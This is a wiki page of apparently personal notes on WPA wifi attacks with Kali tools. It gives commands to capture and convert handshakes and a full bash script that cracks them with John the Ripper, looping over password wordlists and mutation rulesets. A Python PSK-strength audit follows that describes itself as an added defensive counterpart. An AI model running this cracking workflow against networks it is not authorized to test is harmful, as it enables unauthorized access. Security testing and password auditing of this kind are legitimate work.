Kali/Wireless Reboot
From charlesreid1
Reboot
Revisiting some of the old techniques.
Monitor wireless
First is the aircrack-ng suite (airodump-ng) to monitor wifi networks.
Obtain handshakes
Next is besside-ng to obtain WPA handshakes.
Crack handshakes
Once we have the handshakes, use the instructions on the John the Ripper/WPA page to convert the .cap files into .hccap files, then into John the Ripper password files:
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw
Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets that mutate the words in those wordlists (each --rules=NAME refers to a [List.Rules:NAME] section in john.conf). To do that, use a bash script:
#!/bin/bash
# bash, not sh: the script uses arrays, which /bin/sh (dash) does not support.
# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"
cap="wpa.cap"
pwdir="/root/box/08_besside"

# Round 0: plain wordlists, no rules
rulesets=("")
#### Round 1
###rulesets=("KoreLogicRulesAppendYears")
#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt
wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work
# Use a glob rather than parsing `ls` output; skip the literal pattern if nothing matches.
for pwfile in "${pwdir}"/*.johnpw;
do
    [ -e "${pwfile}" ] || continue
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** ** * * * ** ****"
    echo "* ** * *** **** *** * ** ** *** * * * *** *"
    echo " * ***** * * * * *** * * * * * *** * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""
    for rules in "${rulesets[@]}";
    do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . . ."
        echo "... ... .. ...... . .. . . . .... .... ."
        echo "... . .. . . . .. .... . . . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""
        for wordlist in "${wordlists[@]}";
        do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"
            # -z is the portable test for an empty string ("==" is a bash-only spelling of "=")
            if [ -z "${rules}" ] ; then
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
                # actually do it
                mypwd=$(pwd)
                cd "${johndir}" || exit 1
                "${johnbin}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}"
                cd "${mypwd}" || exit 1
            else
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules} ${pwfile}"
                # actually do it
                mypwd=$(pwd)
                cd "${johndir}" || exit 1
                "${johnbin}" --rules="${rules}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}"
                cd "${mypwd}" || exit 1
            fi
        done
    done
done
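As a defensive counterpart to the wordlist-and-rules run above, here is an added Python audit (not code from the original page) that asks the question a network owner should ask before the handshake ever leaves the air: would this pre-shared key fall to exactly that kind of run? It checks WPA2 passphrase length limits, character-class diversity, verbatim wordlist hits, and hits via simple append/prepend mutations. The wordlist is a constructed five-entry stand-in for the SecLists files named in the script, and the mutation set is an assumed approximation of what the KoreLogic rule names suggest, not John's actual rule definitions. It also generates a replacement PSK that the audit accepts.

```python
import re
import secrets
import string
from typing import Iterable, List

# Constructed mini wordlist standing in for the SecLists files named in the
# script above; a real audit would stream the same files the cracking run uses.
SAMPLE_WORDLIST = ["password", "letmein", "sunshine", "dragon", "welcome"]

# Hypothetical approximation of the KoreLogic AppendYears / PrependYears /
# AppendNum / PrependNum / AppendNumNum / PrependNumNum rule names referenced
# in the script. These are NOT John's own rule definitions.
_SUFFIXES = ([str(d) for d in range(10)]             # AppendNum / PrependNum
             + [f"{d:02d}" for d in range(100)]       # AppendNumNum / PrependNumNum
             + [str(y) for y in range(1950, 2031)])   # AppendYears / PrependYears


def mutations(word: str) -> Iterable[str]:
    """Yield the candidates a wordlist+rules run would try for one base word."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for s in _SUFFIXES:
            yield base + s
            yield s + base


def audit_psk(psk: str, wordlist: Iterable[str]) -> List[str]:
    """Return findings for a WPA2 pre-shared key; an empty list means no finding.

    Order of findings: length problems, character-class diversity, then whether
    the PSK is a verbatim wordlist entry or a simple mutation of one.
    """
    findings: List[str] = []
    n = len(psk)
    if not 8 <= n <= 63:
        # A WPA/WPA2 passphrase must be 8 to 63 ASCII characters.
        findings.append("invalid-length")
    elif n < 16:
        findings.append("short")
    classes = sum(bool(re.search(p, psk))
                  for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^a-zA-Z0-9]"))
    if classes < 3:
        findings.append("low-class-diversity")
    for word in wordlist:
        word = word.strip()
        if not word:
            continue
        if psk == word:
            findings.append(f"wordlist:{word}")
            break
        if any(psk == candidate for candidate in mutations(word)):
            findings.append(f"wordlist+rule:{word}")
            break
    return findings


def is_acceptable(psk: str, wordlist: Iterable[str]) -> bool:
    return not audit_psk(psk, wordlist)


_CLASSES = (string.ascii_lowercase, string.ascii_uppercase,
            string.digits, "!@#$%^&*-_=+")


def generate_psk(length: int = 24) -> str:
    """Generate a random PSK containing at least one character from each class."""
    if not 8 <= length <= 63:
        raise ValueError("WPA2 passphrase length must be between 8 and 63")
    rng = secrets.SystemRandom()
    chars = [secrets.choice(c) for c in _CLASSES]      # one of each class
    alphabet = "".join(_CLASSES)
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    rng.shuffle(chars)                                  # CSPRNG-backed shuffle
    return "".join(chars)


if __name__ == "__main__":
    for candidate in ("password", "sunshine2019",
                      "Correct-Horse-Battery-Staple-42", generate_psk()):
        print(f"{candidate!r}: {audit_psk(candidate, SAMPLE_WORDLIST) or 'OK'}")
```

Run it against the real SecLists files by passing an open file handle as the wordlist; the mutation loop is deliberately the same shape as the cracking run, so a PSK that survives it against rockyou.txt and the rules you actually use is the right bar. A long random PSK from generate_psk() is outside the reach of any wordlist, and moving the network to WPA3-SAE removes the offline dictionary attack on the captured handshake altogether.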
Category:Security · Category:Wireless · Category:Passwords